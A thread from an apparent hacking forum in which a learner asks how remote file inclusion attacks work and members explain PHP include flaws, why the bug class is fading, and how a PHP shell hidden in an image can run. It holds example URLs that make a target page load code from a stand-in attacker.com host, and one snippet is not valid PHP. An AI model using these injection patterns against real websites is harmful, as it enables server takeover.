iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Some questions on Remote file inclusion attacks?
  • mandi
    Posts: 207
    Hi guys,
    i have been started to learn/read about RFI attacks and i have readed some books,documents and some tutorials regarding this.

    At the i have been ended up with some questions,i tought it would be good to ask here

    here are my questions:

    1)does RFI attacks only works with the php language?
    2)dont this attack work on other server side scripting languages such as jsp,asp and other server side scripting languages?
    3)if yes why?
    4)is this the one and only form of RFI injection?

    http://www.target.com/vuln_page.php?file=http://attacker.com/malicious

    5)Also what types of files can be injected in the space "malicious"
    is this only limited to php and txt files ?
    6)why this class of vulnerability is dying very fast ?,because when i checked in sites like 1337day and exploit-db for these kind of bugs
    i had seen that last RFI has been posted before 3-4 months,so it seems this breed of bug is dying fast.

    Looking for some answers..
  • m0rph
    Posts: 332
    1) As far as I know, yes RFI is php specific
    2) Don't know
    3) Refer to 2
    4) No, the GET parameter doesn't matter, as long as it refers back to a php include
    i.e.

    http://www.target.com/vuln_page.php?PURPLE=http://attacker.com/malicious

    6) It depends on what type of extension is appended to the include. For the most part it is a php extension.
    i.e.

    include($_GET['PURPLE'], '.php');

    So in the above, anything that is included from PURPLE will be converted to a php script.

    RFI is not very common anymore because a lot of web developers are aware of it, and it's an easy vulnerability to patch. Not saying there aren't RFI vulnerabilities anymore, it's just not as common as it once was.
    while( !(succeed = try() ) );
  • Sh3llc0d3
    Posts: 1,910
    Good reply m0rph!
  • CrashOverron
    Posts: 13
    4) no, not exactly, there are different forms of the vuln but they all basically do the same thing

    5) no because the functions that are used to create RFI vulns read the contents of the given file into the source of the vuln page so if you create a mal JPG file that has a php shell in it then that shell will be exectued but the extension could still be .jpg

    6) its dying out because by default PHP now turns off allow_url_include by default which is required obviously for the current page to include a remote file

    -EDIT-
    2) yes i believe it may be possible in ASP(? i havent test since i dont work with ASP) but ASP has a command #include file="url" which should be capable of using remote files
Add a Comment